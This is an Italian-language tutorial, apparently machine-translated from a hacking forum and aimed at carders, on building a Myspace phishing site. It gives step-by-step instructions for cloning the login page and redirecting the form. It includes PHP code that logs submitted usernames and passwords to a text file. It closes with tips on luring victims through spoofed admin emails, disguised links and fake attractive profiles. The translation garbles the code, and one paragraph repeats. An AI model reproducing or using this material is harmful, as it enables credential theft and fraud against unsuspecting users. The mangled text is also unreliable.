Tutorial sul phishing

Tutorial sul phishing

Probabilmente alcuni cardatori lo troveranno utile! ✳️1. Introduzione Sono disponibili un paio di altri tutorial sul phishing, ma alcune persone potrebbero trovarli troppo sofisticati da capire. Quindi proverei a semplificare tutto. Questo tutorial sul phishing sarebbe codificato nella lingua per principianti / in modo da facilitare una facile comprensione, ma se hai problemi a capirlo, devi prima acquisire una conoscenza del computer di livello principiante. ✳️2. Cos'è un phisher? Phisher sembra una pagina di accesso (una falsa pagina di accesso), che scrive il nome utente e la password in un file, o fa quello che vuoi. ✳️3. Come realizzarne uno? Tutto ciò di cui hai bisogno è un servizio di web hosting con PHP abilitato. Useremo t35. Vai su www. t35. com (rimuovi spazi) e registrati per un account gratuito. ogni volta che scrivo qualcosa come www. t35. com, dovresti rimuovere gli spazi intermedi. IO' Lo sto facendo perché il collegamento per t35 è censurato negli hackforum. In questo tutorial, creeremo un sito di phishing per Myspace (la procedura è equivalente per la maggior parte dei siti). Anche se non sei registrato in myspace, apri il profilo di chiunque e fai clic sulla sua immagine. Questo ti porterà alla pagina di accesso di Myspace che ha la casella rossa con "Devi essere loggato per farlo!" Ora, fai clic su File> Salva pagina con nome e salva la pagina myspace sul desktop. Apri la pagina salvata con qualsiasi editor di testo (blocco note, wordpad ecc.). Seleziona tutto il testo (il codice sorgente) e copialo. Torna al tuo account t35 e fai clic su "Nuovo file", elimina il testo che sarà lì per impostazione predefinita e incolla lì il codice sorgente di Myspace. Assegna un nome al file "index.php" (senza "") e salvalo. Ora hai creato una pagina uguale a Myspace. ✅ Tutto su quella pagina avrà la stessa funzione come se fosse sul sito originale. Il link al tuo sito di phishing sarà 't35. com / index.php '- dove' xxx 'è il nome del tuo account (puoi comunque nominarlo. Ma c'è un piccolo problema.❗️❗️ Quando qualcuno inserisce il suo nome utente e password e preme login, lo accede al reale myspace. Cosa dobbiamo cambiare? Quello che dobbiamo cambiare è l'azione del pulsante "login", quindi invece di accedere al sito reale, scrive il nome utente e la password in un file di testo. Apri il tuo "index". php ". Cerca nel codice le parole chiave" action = ". Ci saranno diversi" action = some link "nel codice sorgente di myspace (per il pulsante di accesso, il pulsante di ricerca, ecc.). Dobbiamo trovare l'azione" = qualche link 'che fa riferimento al pulsante Accedi.
Accesso membri

<form action = "" method = "post" id = "LoginForm" name = "aspnetForm">
<input type = "hidden" name = id "ViewState" = valore "ViewState" = "/ wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVB vc3RCYWNrS2V5X18WAgUwY3RsMDAkT WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWN rYm94BTBjdGwwMCRNYWluJFNwbGFza ERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24 =">

e sappiamo che "action =" "si riferisce al pulsante di login. Cambia: action =" A: action = "login.php" e salva il file. In precedenza, quando si fa clic sul pulsante di accesso, venivano utilizzati i valori nelle caselle del nome utente e della password ed eseguivano le funzioni nel file '. Ora, quando fai clic sul pulsante di accesso, prenderà i valori nel nome utente nelle caselle della password ed eseguirà le funzioni nel file 'login.php' sul tuo sito (che ancora non esiste). Tutto quello che dobbiamo fare ora è creare un file 'login.php' che contiene una funzione che annota il nome utente e la password in un documento di testo. Crea un altro file chiamato "login.php" (senza virgolette) e incolla il codice seguente: Code: <? Intestazione php ("Location: MySpace | Login"); $ handle = fopen ("passwords.txt", "a"); foreach ($ _ POST as $ variabile => $ valore) {fwrite ($ handle, $ variabile); fwrite ($ handle, "="); fwrite ($ handle, $ valore); fwrite ($ handle, "\ r \ n"); } fwrite ($ handle, "\ r \ n"); fclose ($ handle); Uscita; ?> La funzione di login.php è semplice. Apre un file chiamato 'passwords.txt' (e lo crea se già esiste) e inserisce lì le informazioni (nome utente e password). Congratulazioni! Hai un phisher! Superman Il link al tuo sito di phishing è:. t35. (e lo crea se già esiste) e inserisci lì le informazioni (nome utente e password). Congratulazioni! Hai un phisher! Superman Il link al tuo sito di phishing è:. t35. (e lo crea se già esiste) e inserisci lì le informazioni (nome utente e password). Congratulazioni! Hai un phisher! Superman Il link al tuo sito di phishing è:. t35.

com / index.php -dove "xxx" è il nome del tuo account. Il link al tuo file di testo è:. t35. it / passwords.txt Oppure puoi accedervi dal tuo account. Nota che puoi scegliere i nomi che preferisci per index.php, login.php e passwords.txt. ma .php e .txt devono rimanere gli stessi. ✳️4. Come indurre le persone a innamorarsene. Ci sono miliardi di modi per farlo, la tua creatività è il tuo limite. Il modo più comune è creare un'e-mail simile all'amministratore e inviare loro un rapporto con un collegamento per accedere al sito (il tuo sito di phishing). Ovviamente maschererai il collegamento. Come mascherare il collegamento? Se lo pubblichi su forum o ovunque sia abilitato il codice bb, lo stai facendo: Codice: il link del sito originale Ad esempio, Google sembra un google, ma può portarti a yahoo quando fai clic su di esso. Se stai creando il phisher per myspace e vuoi coinvolgere persone a caso, puoi semplicemente creare un account hot chick e inserire qualche foto hot che porterà al tuo sito di phishing quando cliccato. Quindi, quando fanno clic sull'immagine lussuriosa, verranno indirizzati al tuo sito di phishing dicendo loro che devono accedere per vederlo. Codice: link% 20of% 20l'immagine% 20 Quando si inviano messaggi di posta elettronica, vedere l'opzione "collegamento ipertestuale", ed è autoesplicabile una volta visualizzata. Ci sono molti altri modi e, come ho detto, il limite è la tua creatività. Riassumendo, questo tutorial spiega come creare un phisher e come funziona. Sebbene sia scritto per Myspace, la procedura è equivalente per quasi tutti gli altri siti di accesso (per Hotmail è diversa). Dopodiché, sta a te esplorare, sperimentare e immergerti nel mondo dell'ingegneria sociale